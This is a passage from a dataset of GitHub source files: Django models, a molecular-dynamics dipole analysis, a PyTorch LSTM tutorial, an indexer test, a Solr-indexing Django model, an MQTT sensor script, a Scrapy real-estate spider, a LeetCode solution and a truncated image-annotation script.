self.cancelled:\n return \"%s offered %s %s for %s %s\" % (\n self.balance.account,\n self.initial_offer_amount,\n self.balance.currency,\n self.initial_want_amount,\n self.want_currency\n )\n else:\n return \"%s offers %s %s for %s %s\" % (\n self.balance.account,\n self.offer_amount,\n self.balance.currency,\n self.want_amount,\n self.want_currency\n )\n\nclass Transaction(models.Model):\n order = models.ForeignKey(Order, related_name='transactions')\n from_balance = models.ForeignKey(Balance, related_name='sent_transactions')\n to_balance = models.ForeignKey(Balance, related_name='received_transactions')\n amount = get_amount_field() # including commission\n price_paid = get_amount_field()\n commission_rate = models.DecimalField(max_digits=5, decimal_places=4)\n commission_amount = get_amount_field()\n reversed = models.BooleanField(default=False)\n linked_transaction = models.OneToOneField('self', null=True)\n executed = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n if self.linked_transaction:\n return \"%s paid %s %s to %s for %s %s\" % (\n self.from_balance.account,\n self.amount,\n self.from_balance.currency,\n self.to_balance.account,\n self.linked_transaction.amount,\n self.linked_transaction.from_balance.currency\n )\n else:\n return \"%s paid %s %s to %s\" % (\n self.from_balance.account,\n self.amount,\n self.from_balance.currency,\n self.to_balance.account\n )\n\nclass Deposit(models.Model):\n balance = models.ForeignKey(Balance)\n source = models.TextField()\n amount_received = get_amount_field()\n amount_deposited = get_amount_field() # less fees\n accepted = models.BooleanField(default=True)\n refuse_reason = models.TextField(blank=True, null=True)\n timestamp = models.DateTimeField(auto_now_add=True)\n\nclass Withdrawal(models.Model):\n balance = models.ForeignKey(Balance)\n beneficiary = models.TextField()\n amount_requested = get_amount_field()\n amount_withdrawn = get_amount_field() # less fees\n processed = models.BooleanField(default=False)\n accepted = models.BooleanField(default=False)\n refuse_reason = models.TextField(blank=True, null=True)\n requested = models.DateTimeDield(auto_now_add=True)\n last_updated = models.DateTimeDield(auto_now=True)\n","repo_name":"bobquest33/xchgb","sub_path":"txserv/txdb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3094860268","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport numpy as np\nimport time\nimport math\nimport matplotlib.pyplot as plt\nfrom optparse import OptionParser\n\nfrom FrameReader import FrameReader\nfrom Frame import Frame\nimport planeAngles\n\n\ndef polar_coords(xyz, axis1=np.array([0, 0, 0]), axis2=np.array([0, 0, 0]), mod=True):\n \"\"\"\n Convert cartesian coordinates to polar, if axes are given it will be reoriented.\n axis points to the north pole (latitude), axis2 points to 0 on equator (longitude)\n if mod, do angles properly within -pi, +pi\n \"\"\"\n tpi = 2*np.pi\n polar = np.zeros(3)\n xy = xyz[0]**2 + xyz[1]**2\n polar[0] = np.sqrt(xy + xyz[2]**2)\n polar[1] = np.arctan2(np.sqrt(xy), xyz[2]) - axis1[1]\n polar[2] = np.arctan2(xyz[1], xyz[0]) - axis2[2]\n\n if axis2[1] < 0:\n polar[2] = polar[2] + tpi\n if mod:\n polar[1] = polar[1] % (tpi)\n polar[2] = polar[2] % (tpi)\n\n return polar\n\n\ndef print_output(output_all, output, request):\n for name, val in zip(request, output):\n print(\"{0}: {1:4.3f}\".format(\"-\".join(name), val))\n\n\ndef graph_output(output_all):\n rearrange = zip(*output_all)\n plt.figure()\n\n for i, item in enumerate(rearrange):\n plt.subplot(2, 3, i+1)\n data = plt.hist(item, bins=100, normed=1)\n\n\ndef boltzmannInvert(vals, temp=300):\n \"\"\"\n Perform Boltzmann Inversion on a list of numbers assumed to be normally distributed\n :param vals: Array-like of numbers\n :param vals: Temperature of simulation in Kelvin, default 300\n :return: Tuple containing mean value and force constant\n \"\"\"\n if not np.any(vals):\n return (0, 0)\n\n mdat = np.ma.masked_array(vals, np.logical_or(np.isnan(vals), np.equal(vals, np.zeros_like(vals))))\n mean = 180 * np.mean(mdat) / np.pi\n sdev = np.std(mdat)\n fc = 1.987e-3 * temp / (sdev*sdev)\n\n return (mean, fc)\n\n\ndef calcAnglesAll(frame, offset=1, natoms=6):\n \"\"\"\n Calculate dipole angle for every atom in ring\n :param frame: Frame instance\n :param offset: Calculate angle with respect to N around the ring\n :param natoms: Number of atoms in ring\n :return: Numpy array containing angles\n \"\"\"\n angles = np.zeros(natoms)\n for i in xrange(natoms):\n if np.any(frame.atoms[i].dipole):\n angles[i] = frame.dipoleAngle(i, (i+offset) % natoms)\n return angles\n\n\ndef calcImpropersAll(frame, natoms=6):\n \"\"\"\n Calculate dipole improper angle for every atom in ring\n :param frame: Frame instance\n :param natoms: Number of atoms in ring\n :return: Numpy array containing impropers\n \"\"\"\n impropers = np.zeros(natoms)\n for i in xrange(natoms):\n if np.any(frame.atoms[i].dipole):\n impropers[i] = frame.dipoleImproper(i, (i+1) % natoms, (i+5) % natoms)\n return impropers\n\n\ndef calcAnglesPlane(frame, offset=2, natoms=6):\n \"\"\"\n Calculate angle between dipole and plane for every atom in ring\n :param frame: Frame instance\n :param offset: Calculate angle with respect to N around the ring\n :param natoms: Number of atoms in ring\n :return: Numpy array containing angles\n \"\"\"\n angles = np.zeros(natoms)\n for i in xrange(natoms):\n if np.any(frame.atoms[i].dipole):\n norm = frame.planeNormal(i, (i+offset) % natoms, (i+2*offset) % natoms)\n angles[i] = planeAngles.angleBetweenVectors(frame.atoms[i].dipole, norm)\n return angles\n\n\ndef calcConeCenters(frame, natoms=6):\n \"\"\"\n Finds the centers of the dipole rotation cones for each bead, for each frame.\n :param frame: Frame instance\n :param natoms: Number of atoms to use\n :return: Dipole center vectors\n \"\"\"\n vectors = []\n imp = np.zeros(natoms)\n ang = np.zeros(natoms)\n for i in xrange(natoms):\n if np.any(frame.atoms[i].dipole):\n tmp = planeAngles.coneCenter(frame.atoms[i], frame.atoms[(i+1) % natoms], frame.atoms[(i+5) % natoms], float(-60), float(5))\n ang[i] = tmp[0]\n imp[i] = tmp[1]\n return (ang, imp)\n\n\ndef main(filename, nframes=-1, natoms=-1):\n \"\"\"\n Perform analysis of dipoles in LAMMPS trajectory\n :param lammpstrj: Filename of LAMMPS trajectory\n :return: Number of frames in trajectory\n \"\"\"\n np.set_printoptions(precision=3, suppress=True)\n reader = FrameReader(filename)\n\n if natoms < 0:\n natoms = reader.total_atoms\n else:\n natoms = min(natoms, reader.total_atoms)\n\n if nframes < 0:\n nframes = reader.total_frames\n else:\n nframes = min(nframes, reader.total_frames)\n\n angle1 = np.zeros((nframes, 6))\n angle2 = np.zeros((nframes, 6))\n improper = np.zeros((nframes, 6))\n angle3 = np.zeros((nframes, 6))\n # center = []\n center_ang = np.zeros((nframes, 6))\n center_imp = np.zeros((nframes, 6))\n\n frame = Frame(natoms)\n print(nframes)\n for i in xrange(nframes):\n # Read in frame from trajectory and process\n if i % 10 == 0:\n progressBar(i, nframes)\n reader.readFrame(i, frame)\n frame.centreOnMolecule(1)\n angle1_tmp = calcAnglesAll(frame)\n angle2_tmp = calcAnglesAll(frame, 3)\n angle3_tmp = calcAnglesPlane(frame)\n improper_tmp = calcImpropersAll(frame)\n\n center_ang_tmp, center_imp_tmp = calcConeCenters(frame)\n\n # center.append([])\n # center[i].append(calcConeCenters(frame))\n # frame.show_atoms(0,6)\n\n if not np.any(angle1_tmp):\n print(\"AAAAAGH!!!!\")\n\n for j in xrange(6):\n angle1[i, j] = angle1_tmp[j]\n angle2[i, j] = angle2_tmp[j]\n improper[i, j] = improper_tmp[j]\n angle3[i, j] = angle3_tmp[j]\n center_ang[i, j] = center_ang_tmp[j]\n center_imp[i, j] = center_imp_tmp[j]\n\n for j in xrange(6):\n print(\"-\"*5)\n print(boltzmannInvert(angle1[:, j]))\n print(boltzmannInvert(angle2[:, j]))\n print(boltzmannInvert(angle3[:, j]))\n print(boltzmannInvert(improper[:, j]))\n # plotHistogram(reduceArrays(improper[:, j]))\n\n np.savetxt(\"arr1.dat\", angle1)\n np.savetxt(\"arr2.dat\", angle2)\n np.savetxt(\"arr3.dat\", angle3)\n np.savetxt(\"imp1.dat\", improper)\n np.savetxt(\"center_imp.dat\", center_imp)\n np.savetxt(\"center_ang.dat\", center_ang)\n\n # for i in range(nframes):\n # print(\"Frame \" + str(i+1) + \":\")\n # for j in range(5):\n # print(\" Bead \" + str(j+1) + \":\" + str(center[i][0][j]))\n\n # analyseAngles(angle1)\n # analyseAngles(angle2)\n\n return nframes\n\ndef progressBar(num, total, length=50, char_done=\"+\", char_remain=\"-\"):\n \"\"\"\n Print a progress bar\n :param num: Current number of items processed\n :param total: Total number of items to process\n :param length: Length of progress bar - default 50\n :param char_done: Character to use for left of bar\n :param char_remain: Character to use for right of bar\n :return: Nothing\n \"\"\"\n prog = length * (num+1) / total\n remain = length - prog\n print(\"\\r\" + char_done*prog + char_remain*remain, end=\"\")\n\ndef plotHistogram(array):\n plt.hist(array, 100, normed=1, color='blue')\n plt.xlim(-math.pi, math.pi)\n plt.show()\n\n\ndef reduceArrays(array):\n m_array = np.ma.masked_array(array, np.logical_or(np.isnan(array), np.equal(array, np.zeros_like(array))))\n return m_array.compressed()\n\n\nif __name__ == \"__main__\":\n parser = OptionParser()\n parser.add_option(\"-i\", \"--input\",\n action=\"store\", type=\"string\", dest=\"lammpstrj\", default=\"\",\n help=\"Input file - LAMMPS trajectory\", metavar=\"FILE\")\n parser.add_option(\"-n\", \"--natoms\",\n action=\"store\", type=\"int\", dest=\"natoms\", default=\"-1\",\n help=\"Number of atoms to calculate for\")\n parser.add_option(\"-f\", \"--nframes\",\n action=\"store\", type=\"int\", dest=\"nframes\", default=\"-1\",\n help=\"Number of frames to calculate\")\n # parser.add_option(\"-v\", \"--verbose\",\n # action=\"store_true\", dest=\"verbose\", default=False,\n # help=\"Make more verbose\")\n (options, args) = parser.parse_args()\n print(\"=\"*25)\n if not options.lammpstrj:\n print(\"Must provide LAMMPS trajectory to run\")\n sys.exit(1)\n t_start = time.clock()\n nframes = main(options.lammpstrj, options.nframes)\n t_end = time.clock()\n print(\"-\"*25 + \"\\nCalculated {0} frames in {1}s\\n\".format(nframes, (t_end - t_start)) + \"=\"*25)\n","repo_name":"jag1g13/dipoleAnalysis-bitbucket","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12997632586","text":"# %%\n# code by Tae Hwan Jung @graykode\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\ndef make_batch():\n input_batch, target_batch = [], []\n\n for seq in seq_data:\n input = [word_dict[n] for n in seq[:-1]] # 'm', 'a' , 'k' is input\n target = word_dict[seq[-1]] # 'e' is target\n input_batch.append(np.eye(n_class)[input])\n target_batch.append(target)\n\n return input_batch, target_batch\n\nclass TextLSTM(nn.Module):\n def __init__(self):\n super(TextLSTM, self).__init__()\n\n self.lstm = nn.LSTM(input_size=n_class, hidden_size=n_hidden)\n self.W = nn.Linear(n_hidden, n_class, bias=False)\n self.b = nn.Parameter(torch.ones([n_class]))\n\n def forward(self, X):\n input = X.transpose(0, 1) # X : [n_step, batch_size, n_class]\n\n hidden_state = torch.zeros(1, len(X), n_hidden) # [num_layers(=1) * num_directions(=1), batch_size, n_hidden]\n cell_state = torch.zeros(1, len(X), n_hidden) # [num_layers(=1) * num_directions(=1), batch_size, n_hidden]\n\n outputs, (_, _) = self.lstm(input, (hidden_state, cell_state))\n outputs = outputs[-1] # [batch_size, n_hidden]\n model = self.W(outputs) + self.b # model : [batch_size, n_class]\n return model\n\nif __name__ == '__main__':\n n_step = 3 # number of cells(= number of Step)\n n_hidden = 128 # number of hidden units in one cell\n\n char_arr = [c for c in 'abcdefghijklmnopqrstuvwxyz']\n word_dict = {n: i for i, n in enumerate(char_arr)}\n number_dict = {i: w for i, w in enumerate(char_arr)}\n n_class = len(word_dict) # number of class(=number of vocab)\n\n seq_data = ['make', 'need', 'coal', 'word', 'love', 'hate', 'live', 'home', 'hash', 'star']\n\n model = TextLSTM()\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n input_batch, target_batch = make_batch()\n input_batch = torch.FloatTensor(input_batch)\n target_batch = torch.LongTensor(target_batch)\n\n # Training\n for epoch in range(1000):\n optimizer.zero_grad()\n\n output = model(input_batch)\n loss = criterion(output, target_batch)\n if (epoch + 1) % 100 == 0:\n print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.6f}'.format(loss))\n\n loss.backward()\n optimizer.step()\n\n inputs = [sen[:3] for sen in seq_data]\n\n predict = model(input_batch).data.max(1, keepdim=True)[1]\n print(inputs, '->', [number_dict[n.item()] for n in predict.squeeze()])","repo_name":"graykode/nlp-tutorial","sub_path":"3-2.TextLSTM/TextLSTM.py","file_name":"TextLSTM.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":13202,"dataset":"github-code","pt":"72"} +{"seq_id":"445928499","text":"# coding: utf-8\n\n\"\"\"\nТест проверяет, что для моделей и кластеров, у которых есть MBO-параметры\nлицензиар, франщиза, персонаж (licensor, hero_global, pers_model)\nпроставляются соответствующие поисковые литералы\n\"\"\"\n\n\nimport pytest\nfrom hamcrest import assert_that\n\nfrom market.idx.yatf.matchers.env_matchers import HasDocs\nfrom market.idx.yatf.resources.mbo.models_pb import ModelsPb\nfrom market.idx.yatf.resources.mbo.parameters_pb import ParametersPb\nfrom market.idx.models.yatf.test_envs.models_indexer import ModelsIndexerTestEnv\nfrom market.idx.models.yatf.resources.models_indexer.cluster_pictures import ClusterPicturesMmap\n\nfrom market.proto.content.mbo.ExportReportModel_pb2 import (\n ExportReportModel,\n ParameterValue,\n)\nfrom market.proto.content.mbo.MboParameters_pb2 import Category, Parameter\n\n\nMODEL_ID_1 = 1\nMODEL_ID_3 = 3\n\n\n@pytest.fixture(scope=\"module\", params=[90592])\ndef category_parameters(request):\n return Category(\n hid=request.param,\n parameter=[\n Parameter(\n id=15060326,\n xsl_name='licensor',\n published=True,\n ),\n Parameter(\n id=14020987,\n xsl_name='hero_global',\n published=True,\n ),\n Parameter(\n id=15086295,\n xsl_name='pers_model',\n published=True,\n ),\n ]\n )\n\n\n@pytest.fixture(scope=\"module\", params=[90592])\ndef category_parameters_not_published(request):\n return Category(\n hid=request.param,\n parameter=[\n Parameter(\n id=15060326,\n xsl_name='licensor',\n ),\n Parameter(\n id=14020987,\n xsl_name='hero_global',\n published=False,\n ),\n ]\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef models(category_parameters):\n models = []\n\n model1 = ExportReportModel(id=MODEL_ID_1,\n category_id=category_parameters.hid,\n vendor_id=152712,\n current_type='GURU',\n published_on_market=True,\n parameter_values=[\n ParameterValue(\n param_id=15060326,\n xsl_name='licensor',\n option_id=111,\n ),\n ParameterValue(\n param_id=14020987,\n xsl_name='hero_global',\n option_id=222,\n ),\n ParameterValue(\n param_id=15086295,\n xsl_name='pers_model',\n option_id=333,\n ),\n ])\n models.append(model1)\n\n model2 = ExportReportModel(id=MODEL_ID_3,\n category_id=category_parameters.hid,\n vendor_id=152712,\n current_type='GURU',\n published_on_market=True,\n parameter_values=[\n ParameterValue(\n param_id=15060326,\n xsl_name='licensor',\n option_id=555,\n ),\n ParameterValue(\n param_id=14020987,\n xsl_name='hero_global',\n option_id=0,\n ),\n ParameterValue(\n param_id=15086295,\n xsl_name='pers_model',\n ),\n ])\n models.append(model2)\n return models\n\n\n@pytest.fixture(scope=\"module\")\ndef workflow(models, category_parameters):\n resources = {\n 'models': ModelsPb(models, category_parameters.hid),\n 'parameters': ParametersPb(category_parameters),\n 'cluster_pictures_mmap': ClusterPicturesMmap([]),\n }\n with ModelsIndexerTestEnv(**resources) as env:\n env.execute()\n env.verify()\n yield env\n\n\n@pytest.fixture(scope=\"module\")\ndef workflow_not_published_params(models, category_parameters_not_published):\n resources = {\n 'models': ModelsPb(models, category_parameters_not_published.hid),\n 'parameters': ParametersPb(category_parameters_not_published),\n 'cluster_pictures_mmap': ClusterPicturesMmap([]),\n }\n with ModelsIndexerTestEnv(**resources) as env:\n env.execute()\n env.verify()\n yield env\n\n\ndef test_model_bvl_search_literals(workflow):\n assert_that(\n workflow,\n HasDocs()\n .attributes(hyper=str(MODEL_ID_1))\n .literals(licensor='111', hero_global='222', pers_model='333'),\n 'Для модели проставились все три поисковых литерала')\n\n\ndef test_model_wrong_mbo_param_values(workflow):\n assert_that(\n workflow,\n HasDocs()\n .attributes(hyper=str(MODEL_ID_3))\n .literals(licensor='555', hero_global=None, pers_model=None),\n 'Для модели проставился лицензиар, франшиза не проставилась, т.к. равна 0, персонажа - нету')\n\n\ndef test_model_not_published_bvl_params(workflow_not_published_params):\n assert_that(\n workflow_not_published_params,\n HasDocs()\n .attributes(hyper=str(MODEL_ID_1))\n .literals(licensor=None, hero_global=None, pers_model=None),\n 'Не проставлены литералы: licensor - нет признака published, hero_global - pulished = False, pers_model - нет параметра в категории')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/yatf/models_indexer/test_search_literals_bvl_models.py","file_name":"test_search_literals_bvl_models.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35223545078","text":"from django.db import models\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete\n\n\nclass Recueil(models.Model):\n class Meta:\n app_label=\"website\"\n verbose_name = \"Recueil\"\n verbose_name_plural = \"Recueils\"\n\n IMPRIME = 'imp'\n MANUSCRIT = 'ms'\n CHOIX_FORMAT = (\n (MANUSCRIT, 'manuscrit'),\n (IMPRIME, 'imprime'),\n )\n\n titre = models.CharField(max_length=255, blank=True, null=True)\n titre_traduit = models.CharField(max_length=255, blank=True, null=True)\n catalogue_id = models.ForeignKey(\"website.Catalogue\", related_name='recueil',blank=True, null=True)\n support = models.CharField(max_length=3, choices=CHOIX_FORMAT, default=IMPRIME)\n ville_edition = models.ForeignKey(\"website.Localisation\", related_name='lieu_d_edition_de',blank=True, null=True)\n datation = models.IntegerField(max_length=4, blank=True, null=True)\n editeur = models.ForeignKey(\"website.Personne\", related_name='editions', blank=True, null=True)\n compositeurs = models.ManyToManyField(\"website.Personne\", blank=True, null=True)\n nombre_pieces = models.IntegerField(max_length=4, blank=True, null=True)\n genre_musical_normalise = models.ManyToManyField(\"website.GenreMusicalNormalise\", related_name='recueils', blank=True, null=True)\n genre_musical_detaille = models.ManyToManyField(\"website.GenreMusicalDetaille\", related_name='recueils', blank=True, null=True)\n reedition = models.ManyToManyField(\"self\", blank=True, null=True)\n remarques = models.TextField(blank=True, null=True)\n projet = models.ManyToManyField(\"website.Projet\", related_name='dans')\n exemplaire = models.ManyToManyField(\"website.Exemplaire\", related_name='autres_exemplaires', blank=True, null=True)\n\n def __unicode__(self):\n return u\"{0}\".format(self.catalogue_id)\n\n@receiver(post_save, sender=Recueil)\ndef solr_index(sender, instance, created, **kwarg):\n import uuid\n from django.conf import settings\n import solr\n\n\n solrconn = solr.SolrConnection(settings.SOLR_SERVER)\n record = solrconn.query(\"type:website_recueil item_id:{0}\".format(instance.id))\n if record:\n # the record already exists, so we'll remove the first\n solrconn.delete(record.results[0]['id'])\n\n recueil = instance\n\n catalogueidentifiant = \"\"\n if recueil.catalogue_id.choix_catalogue != \"\":\n catalogueidentifiant = u\"{0}, {1}\".format(recueil.catalogue_id.choix_catalogue, recueil.catalogue_id.identifiant)\n else:\n catalogueidentifiant = u\"{0}\".format(recueil.catalogue_id.identifiant)\n\n ville = \"\"\n if recueil.ville_edition.nom_ville_normalise_langue !=\"\":\n ville = u\"{0}, ({1})\".format(recueil.ville_edition.nom_ville_normalise_langue, recueil.ville_edition.pays_normalise_langue)\n else:\n ville = u\"{0}\".format(recueil.ville_edition.pays_normalise_langue)\n\n projetnom = u\"{0}\".format(recueil.projet.all().values_list('nom_du_projet'))\n\n\n d = {\n 'type': 'website_recueil',\n 'id': str(uuid.uuid4()),\n 'item_id':recueil.id,\n 'titre':recueil.titre,\n 'titre_traduit':recueil.titre_traduit,\n 'support':recueil.support,\n 'datation':recueil.datation,\n 'compositeurs':recueil.compositeurs.all().values_list('nom'),\n 'nombre_pieces':recueil.nombre_pieces,\n 'remarques':recueil.remarques,\n 'catalogue':catalogueidentifiant,\n 'ville_edition':ville,\n 'projet':projetnom,\n\n\n }\n solrconn.add(**d)\n solrconn.commit()\n\n\n@receiver(post_delete, sender=Recueil)\ndef solr_delete(sender, instance, created, **kwargs):\n from django.conf import settings\n import solr\n solrconn = solr.SolrConnection(settings.SOLR_SERVER)\n record = solrconn.query(\"type:website_recueil item_id:{0}\".format(instance.id))\n solrconn.delete(record.results[0]['id'])\n solrconn.commit()\n\n","repo_name":"acTanguy/projet","sub_path":"ricercar/website/models/recueil.py","file_name":"recueil.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10061718167","text":"#!/usr/bin/python3\n\n# Args: my_list = elmnt is printed frm this lst , x(int)\n# Return: num of elmnt\n\ndef safe_print_list_integers(my_list=[], x=0):\n ret_elmnt = 0\n for i in range(0, x):\n try:\n print(\"{:d}\".format(my_list[i]), end=\"\")\n ret_elmnt = ret_elmnt + 1\n except (ValueError, TypeError):\n continue\n print(\"\")\n return (ret_elmnt)\n","repo_name":"Sayere1/alx-higher_level_programming","sub_path":"0x05-python-exceptions/2-safe_print_list_integers.py","file_name":"2-safe_print_list_integers.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26783414530","text":"from machine import Pin, I2C\nfrom dht12 import DHT12\nfrom umqtt.simple import MQTTClient\nimport time\n\ndef poll_sensor():\n i2c = I2C(scl = Pin(5), sda = Pin(4))\n sensor = DHT12(i2c)\n sensor.measure()\n t = sensor.temperature()\n h = sensor.humidity()\n return t, h\n\ndef publish(t, h):\n c=MQTTClient('my_sensor', 'iot.eclipse.org') #change my_sensor!!\n c.connect()\n c.publish('RIFF/phil/temperature', str(t)) # change the topic tree!\n c.publish('RIFF/phil/humidity', str(h)) # change the topic tree!\n c.disconnect()\n\nwhile True:\n t, h = poll_sensor()\n publish(t, h)\n time.sleep(60)\n","repo_name":"philwilkinson40/Micropython_course","sub_path":"code/main_regularex.py","file_name":"main_regularex.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"36785208618","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re\r\n\r\nfrom pymongo import MongoClient\r\n\r\nimport scrapy\r\nfrom scrapy.conf import settings\r\nfrom scrapy.selector import Selector\r\nfrom scrapy.spiders import CrawlSpider\r\nfrom anjuke.items import PageItem, HouseItem\r\n\r\n\r\nclass AnjukeSpider(CrawlSpider):\r\n name = 'anjuke'\r\n start_urls = ['https://m.anjuke.com/gz/sale/']\r\n custom_settings = {\r\n #\"DOWNLOAD_DELAY\": 5,\r\n \"DEFAULT_REQUEST_HEADERS\": {\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\r\n 'Accept-Encoding': 'gzip, deflate, br',\r\n 'Accept-Eanguage': 'zh-CN,zh;q=0.9,en;q=0.8',\r\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\r\n }\r\n }\r\n dont_redirect = True\r\n handle_httpstatus_list = [302]\r\n\r\n def __init__(self):\r\n client = MongoClient(settings['MONGODB_SERVER'], settings['MONGODB_PORT'])\r\n db = client[settings['MONGODB_DB']]\r\n self.pageColl = db[settings['MONGODB_COLLECTION_PAGE']]\r\n self.houseColl = db[settings['MONGODB_COLLECTION_HOUSE']]\r\n\r\n def start_requests(self):\r\n for i in range(1, 60):\r\n url = 'https://m.anjuke.com/gz/sale/?from=anjuke_home&page='+str(i)\r\n result = self.pageColl.find_one({'page_url': url})\r\n if result:\r\n urls = result['house_urls']\r\n for url in urls:\r\n if self.check_url(url):\r\n yield scrapy.Request(url, callback=self.parse_item)\r\n else:\r\n yield scrapy.Request(url, callback=self.parse_page)\r\n\r\n def parse_page(self, response):\r\n selector = Selector(response)\r\n urls = selector.xpath('//a[contains(@class, \"house-item\")]/@href').extract()\r\n \r\n item = PageItem()\r\n item['page'] = re.match(r'.*&page=(\\d*).*', response.url, re.M | re.I).group(1)\r\n item['page_url'] = response.url\r\n item['house_urls'] = urls\r\n yield item\r\n\r\n for url in urls:\r\n if self.check_url(url):\r\n yield scrapy.Request(url, callback=self.parse_item)\r\n\r\n def check_url(self, url):\r\n house_id = re.match(r'.*/gz/sale/(\\w*).*', url, re.M | re.I)\r\n if str(house_id) == 'None':\r\n return False\r\n else:\r\n result = self.houseColl.find_one({'house_id': house_id.group(1)})\r\n if result:\r\n return False\r\n else:\r\n return True\r\n\r\n def parse_item(self, response):\r\n selector = Selector(response)\r\n housebasic = selector.xpath('//div[@class=\"house-info-content\"]')\r\n if len(housebasic.extract()) > 0:\r\n # 存放房子信息\r\n item = HouseItem()\r\n item['house_id'] = re.match(r'.*/gz/sale/(\\w*).*', response.url, re.M | re.I).group(1)\r\n item['title'] = housebasic.xpath('normalize-space(./div[@class=\"house-address\"]/text())').extract()[0]\r\n item['tolprice_unit'] = housebasic.xpath('normalize-space(./div[@class=\"house-data\"]/span[1]/text())').extract()[0]\r\n item['tolprice'] = int(item['tolprice_unit'].replace('万',''))\r\n item['area'] = housebasic.xpath('normalize-space(./div[@class=\"house-data\"]/span[2]/text())').extract()[0]\r\n item['mode'] = housebasic.xpath('normalize-space(./div[@class=\"house-data\"]/span[3]/text())').extract()[0]\r\n item['web_url'] = response.url\r\n\r\n names = [\r\n 'price',\r\n 'orientation',\r\n 'floor',\r\n 'decorate',\r\n 'built',\r\n 'house_type',\r\n 'agelimit',\r\n 'elevator',\r\n 'only',\r\n 'budget',\r\n 'district',\r\n 'traffic',\r\n ]\r\n houseinfo = selector.xpath('//ul[@class=\"info-list\"]/li')\r\n for i, info in enumerate(houseinfo):\r\n name = names[i]\r\n text = info.xpath('normalize-space(./text())').extract()\r\n a_text = info.xpath('normalize-space(./a[1]/text())').extract()\r\n if name == 'budget':\r\n item[name] = a_text[0]\r\n elif name == 'district':\r\n item[name] = a_text[0] + text[0]\r\n else:\r\n item[name] = text[0]\r\n # print(item)\r\n return item\r\n","repo_name":"hsuna/scrapy-anjuke","sub_path":"anjuke/spiders/spiders.py","file_name":"spiders.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16999018345","text":"'''\n637.\nAverage of Levels in Binary Tree\nhttps://leetcode.com/problems/average-of-levels-in-binary-tree/\n'''\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def averageOfLevels(self, root: TreeNode) -> list(float):\n if not root:\n return []\n \n avgs = []\n current = [root]\n while current:\n nextNode = []\n avg = sum(n.val for n in current) / len(current) # 현재 깊이 노드 값들의 합 / 노드 개수\n avgs.append(avg)\n while current: # 다음 깊이 노드들을 찾아서 nextNode 배열에 저장\n node = current.pop()\n if node.left:\n nextNode.append(node.left)\n\n if node.right:\n nextNode.append(node.right)\n \n current = nextNode # 다음 깊이로 이동\n \n return avgs\n\n'''\nRuntime: 36 ms, faster than 99.85% of Python3 online submissions for Average of Levels in Binary Tree.\nMemory Usage: 16.7 MB, less than 29.79% of Python3 online submissions for Average of Levels in Binary Tree.\n'''","repo_name":"ohoon/leetcode_ex","sub_path":"easy/Average_of_Levels_in_Binary_Tree.py","file_name":"Average_of_Levels_in_Binary_Tree.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16666120271","text":"import json, cv2, numpy as np, itertools, random, pandas as pd\nfrom skimage import io\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom tqdm.auto import tqdm\nfrom sklearn import model_selection\nfrom copy import deepcopy\nimport cv2\nimport os\nimport pickle\nfrom scipy.spatial import distance\n\nfeature_list = pickle.load(open('dino-all-feature-list.pickle','rb'))\nfilenames = pickle.load(open('dino-all-filenames.pickle','rb'))\n\nfeature_map = {}\nfor filename, feature in zip(filenames, feature_list):\n feature_map[filename] = feature\n\ntrain_df = pd.read_csv(\"train/groundtruth.csv\")\nwarmup_train_df = pd.read_csv(\"warmup_train/groundtruth.csv\")\nwarmup_train_df = warmup_train_df.drop(warmup_train_df.columns[0], axis=1)\nprint(warmup_train_df.head())\ndf = pd.concat([train_df, warmup_train_df])\nprint(df.head())\ncoco_data = {\"info\": {}, \"licenses\": [], \"categories\": [], \"images\": [], \"annotations\": []}\ncategories = []\nfor index, row in df.iterrows():\n class_id = row[\"class_id\"]\n if class_id == 15:\n continue\n if class_id > 15:\n class_id = class_id - 1\n if class_id > 11:\n class_id = class_id - 1\n class_name = row[\"class_name\"]\n\n if class_name not in categories:\n categories.append(class_name)\n coco_data[\"categories\"].append({\"id\": class_id, \"name\": class_name})\n\nimage_ids = {}\nbbox_dup_check = {}\nfeature_dup_check = set()\nindex = 0\nc_dup_bbox = 0\nc_dup_feature = 0\nc_remove = 0\nlarge_class = {0: \"assam macaque\", 3: \"chinese serow\", 4: \"roosevelt's muntjac\", 6: \"wild boar\", 10: \"giant muntjac\",\n 19: \"grey peacock-pheasant\", 22: 